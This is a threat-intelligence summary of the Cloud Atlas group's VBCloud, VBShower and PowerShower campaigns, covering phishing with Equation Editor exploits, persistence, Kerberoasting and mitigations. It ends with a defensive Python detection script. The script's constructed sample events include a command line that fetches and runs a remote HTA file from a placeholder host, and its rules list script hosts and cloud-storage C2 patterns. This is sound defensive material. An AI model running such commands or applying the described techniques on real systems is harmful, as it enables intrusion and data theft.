Full Report
The threat actor known as Cloud Atlas has been observed using a previously undocumented malware called VBCloud as part of its cyber attack campaigns targeting "several dozen users" in 2024. "Victims get infected via phishing emails containing a malicious document that exploits a vulnerability in the formula editor (CVE-2018-0802) to download and execute malware code," Kaspersky researcher Oleg
Analysis Summary
# Threat Actor: Cloud Atlas
## Attribution & Identity
* **Identification:** Unattributed threat activity cluster.
* **Known Aliases:** Clean Ursa, Inception, Oxygen, Red October.
* **Active Since:** 2014.
## Activity Summary
* **Recent Campaigns (2024):** Observed using a previously undocumented malware named VBCloud in cyber attack campaigns targeting several dozen users.
* **Historical Activities:**
  * Linked to cyber attacks in December 2022 targeting Russia, Belarus, and Transnistria, deploying the PowerShower PowerShell-based backdoor.
  * Conducted spear-phishing attacks in December 2023 against Russian entities exploiting CVE-2017-11882 to drop a VBS payload, leading to the deployment of VBShower, PowerShower, and VBCloud.
* **Overall Objective:** Ultimately aims to steal data from victims' devices.
## Tactics, Techniques & Procedures
* **Initial Access:** Phishing emails containing malicious Microsoft Office documents.
* **Exploitation:** Exploiting historical vulnerabilities in the Microsoft Office Equation Editor:
  * CVE-2018-0802 (used for initial download/execution of malware code and HTA file).
  * CVE-2017-11882 (used in past campaigns to drop VBS payload).
* **Execution & Persistence:**
  * Downloading and executing malware via an RTF template that fetches an HTML Application (HTA) file.
  * Abusing NTFS Alternate Data Streams (ADS) to extract and create VBShower backdoor components (%APPDATA%\\Roaming\\Microsoft\\Windows\\).
  * VBCloud establishes persistence via a scheduled task triggered upon user login.
* **Defense Evasion:** VBShower includes a cleaner script to erase evidence, specifically wiping contents of the "\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\" folder and related components.
* **Lateral Movement & Credential Access:** PowerShower modules perform post-exploitation activities including:
  * Gathering local group/member information via Active Directory Service Interfaces (ADSI).
  * Conducting dictionary attacks on user accounts.
  * Executing payloads to facilitate Kerberoasting attacks for obtaining Active Directory credentials.
* **Collection:**
  * **PowerShower:** Probes the local network for further infiltration.
  * **VBCloud:** Gathers system metadata, file information (DOC, DOCX, XLS, XLSX, PDF, TXT, RTF, RAR extensions), Telegram-related files, drive information (letter, type, size).
* **Backdoor Functionality:** The in-memory VBShower backdoor can reboot the system, gather running process/scheduler task information, and install PowerShower and VBCloud.
## Targeting
* **Sectors:** Not explicitly detailed, but the activity targets specific "users" and "entities."
* **Geography:**
  * **Primary:** Russia (over 80% of targets).
  * **Secondary:** Belarus, Canada, Moldova, Israel, Kyrgyzstan, Turkey, and Vietnam.
* **Victims:** "Several dozen users" targeted in 2024; various entities in Russia targeted in 2023.
## Tools & Infrastructure
* **Malware Families Used:**
  * **VBCloud:** New backdoor utilizing public cloud storage for C2.
  * **VBShower:** Multi-stage VBS backdoor/loader component.
  * **PowerShower:** PowerShell-based backdoor used for reconnaissance and credential attacks.
* **Infrastructure:**
  * Initial stages are fetched from a remote server that hosts the RTF exploit template and the subsequent malware stages.
  * VBCloud utilizes **public cloud storage services** for C2 communications.
## Implications
Cloud Atlas remains a sophisticated, state-adjacent threat actor showing a preference for exploiting legacy, known Microsoft Office vulnerabilities (Formula/Equation Editor flaws) to gain initial access. Its TTPs demonstrate a multi-stage approach, combining VBScript-based file system manipulation (VBShower) with PowerShell for deep enumeration and credential harvesting (PowerShower, Kerberoasting). The introduction of VBCloud, which uses cloud storage for C2, indicates an adaptation intended to evade traditional network-based defenses.
## Mitigations
* **Patch Management:** Immediately patch systems against known MS Office Equation Editor vulnerabilities (CVE-2018-0802, CVE-2017-11882).
* **Email Security:** Strengthen email filtering and implement robust macro/script blocking policies for Office documents originating from external sources.
* **Endpoint Detection & Response (EDR):** Monitor for processes executing HTA files, creation of files within %APPDATA%\\Roaming\\Microsoft\\Windows\\ via file system monitoring, and the use of NTFS Alternate Data Streams.
* **Network Monitoring:** Monitor for outbound connections to known public cloud storage services that might be indicative of C2 traffic, particularly when initiated by unusual user processes.
* **Active Directory Security:** Implement strong credential hygiene, monitor for unusual Active Directory enumeration activities (ADSI calls), and enforce multi-factor authentication to mitigate the impact of any successful Kerberoasting attacks.
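The EDR and network-monitoring items above describe what to look for but not how to turn it into a detection. The following Python script is an added example (not Kaspersky's tooling or anything from the report) that triages Sysmon-style endpoint events for those behaviours: HTA execution spawned by an Office process, file writes under %APPDATA%\Roaming\Microsoft\Windows\, NTFS alternate data stream creation, and script hosts connecting to cloud-storage hostnames. The Sysmon event IDs used (1 ProcessCreate, 3 NetworkConnect, 11 FileCreate, 15 FileCreateStreamHash) are real; the JSON event shape, the sample records, and the cloud-storage domain list are constructed for this illustration and must be adapted to your own telemetry.

```python
"""Triage constructed Sysmon-style JSON events for the Cloud Atlas behaviours
named in the mitigations: HTA execution, Office-spawned script hosts, writes
under %APPDATA%\\Roaming\\Microsoft\\Windows\\, ADS creation, and script hosts
talking to cloud storage. Event schema and samples are constructed, not real."""
from __future__ import annotations

import json
import re
from typing import Iterable

# Sysmon event IDs: 1 ProcessCreate, 3 NetworkConnect, 11 FileCreate,
# 15 FileCreateStreamHash (emitted when an alternate data stream is written).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
# Placeholder domains (assumption): replace with the cloud-storage services
# your outbound telemetry actually shows.
CLOUD_STORAGE_DOMAINS = {"storage.example", "drive.example"}
# %APPDATA% expands to <profile>\AppData\Roaming, so match on the expanded path.
WATCHED_DIR = re.compile(r"\\AppData\\Roaming\\Microsoft\\Windows\\", re.IGNORECASE)
# A trailing ":name" after the file name denotes an alternate data stream.
ADS_STREAM = re.compile(r":[^\\:]+$")
# Zone.Identifier is the Mark-of-the-Web stream on every download; flagging it
# would drown real ADS abuse in noise.
BENIGN_STREAMS = {"zone.identifier"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list[str]:
    """Return the list of detection labels that apply to one event."""
    findings: list[str] = []
    eid = event.get("EventID")
    if eid == 1:
        image = basename(event.get("Image", ""))
        parent = basename(event.get("ParentImage", ""))
        cmd = event.get("CommandLine", "").lower()
        if image == "mshta.exe" or ".hta" in cmd:
            findings.append("hta-execution")
        if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
            findings.append("office-spawned-script-host")
    elif eid in (11, 15):
        target = event.get("TargetFilename", "")
        if WATCHED_DIR.search(target):
            findings.append("file-write-appdata-windows")
        match = ADS_STREAM.search(target)
        stream = match.group(0)[1:] if match else ""
        if (eid == 15 or stream) and stream.lower() not in BENIGN_STREAMS:
            findings.append("ads-stream-create")
    elif eid == 3:
        image = basename(event.get("Image", ""))
        host = event.get("DestinationHostname", "").lower()
        if image in SCRIPT_HOSTS and any(host.endswith(d) for d in CLOUD_STORAGE_DOMAINS):
            findings.append("script-host-to-cloud-storage")
    return findings


def triage(lines: Iterable[str]) -> list[dict]:
    """Parse JSON-lines events and keep only those with at least one finding."""
    hits = []
    for n, line in enumerate(lines, 1):
        event = json.loads(line)
        findings = classify(event)
        if findings:
            hits.append({"line": n, "event_id": event.get("EventID"), "findings": findings})
    return hits


# Constructed sample telemetry (not real Cloud Atlas artefacts).
SAMPLE_EVENTS = [
    r'{"EventID": 1, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "mshta.exe http://staging.example/x.hta"}',
    r'{"EventID": 11, "TargetFilename": "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\update.vbs"}',
    r'{"EventID": 15, "TargetFilename": "C:\\Users\\alice\\Downloads\\invoice.rtf:Zone.Identifier"}',
    r'{"EventID": 15, "TargetFilename": "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\loader.vbs:payload"}',
    r'{"EventID": 3, "Image": "C:\\Windows\\System32\\wscript.exe", "DestinationHostname": "files.storage.example"}',
    r'{"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe notes.txt"}',
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"line {hit['line']} (event {hit['event_id']}): {', '.join(hit['findings'])}")
```

Each label is deliberately narrow so that analysts can tune them independently; in practice the Zone.Identifier exclusion and the office-parent list are the two knobs that need the most adjustment to a given environment, and the `ads-stream-create` label should additionally be correlated with `file-write-appdata-windows` on the same host before paging anyone.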